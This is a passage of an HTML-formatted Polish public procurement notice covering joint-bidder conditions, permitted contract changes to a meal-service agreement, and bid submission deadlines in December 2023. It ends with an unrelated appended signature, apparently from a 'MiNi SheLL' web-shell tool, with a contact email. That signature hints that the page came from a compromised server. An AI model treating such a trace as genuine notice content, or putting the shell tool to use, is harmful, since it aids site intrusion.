Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, oświadczenie o spełnianiu warunków, o których mowa w pkt.5.1 składa przynajmniej jeden z Wykonawców lub wszyscy Wykonawcy złożą oświadczenia lub wspólne oświadczenie, że łącznie spełniają te warunki.<br/><br/>Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić Zamawiającemu, że realizując zamówienie będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. <br/><br/>Do oferty nie należy dołączać podmiotowych środków dowodowych wskazanych w pkt. 5.3 i 5.4. SWZ (ubezpieczenie OC, wykaz usług). Podmiotowe środki dowodowe składa się na wezwanie Zamawiającego na zasadach określonych w art. 274 ustawy Pzp. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunki określone w pkt. 5.1. – 5.4. winien spełniać jeden Wykonawca, lub wszyscy Wykonawcy wspólnie. <br/>Pełnomocnictwo ustanowione do reprezentowania Wykonawcy ubiegającego się lub Wykonawców ubiegających się wspólnie, o udzielenie zamówienia publicznego albo reprezentowanie w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonania zmiany postanowień Umowy określonych w § 8 <br/> wzoru umowy (załącznik nr 6 do SWZ):- w przypadku zaistnienia okoliczności uzasadniających konieczność wprowadzenia <br/> zmian w jadłospisie, z tym zastrzeżeniem, iż zmiany te nie mogą mieć wpływu na <br/> jednostkową cenę posiłków i tym samym wartości całej umowy;<br/>- w zakresie zmiany ustawowej wysokości podatku VAT: jeżeli w trakcie realizacji <br/> przedmiotu Umowy nastąpi zmiana stawki podatku VAT dla usług objętych <br/> przedmiotem zamówienia, Strony dokonają odpowiedniej zmiany wynagrodzenia,<br/>- w przypadku wystąpienia siły wyższej, czyli zdarzenia, którego nie można było <br/> przewidzieć, maksymalny okres przesunięcia terminu zakończenia umowy będzie <br/> równy okresowi przerwy w świadczeniu usługi. Siła wyższa, to zdarzenie <br/> zewnętrzne o obiektywnie małym stopniu prawdopodobieństwa pojawienia się <br/> zdarzenia w określonej sytuacji, a którego szkodliwe następstwo przy zastosowaniu <br/> współczesnej techniki uniemożliwia wykonawcy wykonywanie w części lub całości <br/> jego zobowiązań; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Elektronicznie za pośrednictwem Platformy Zakupowej, zgodnie z instrukcją dla Wykonawcy ‘Udział w trybie podstawowym bez negocjacji” dostępnej na stronie : https://senior-czeladz.logintrade.net/rejestracja/instrukcje.html Język, w którym można sporządzać oferty: polski</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-07 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-01-05</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com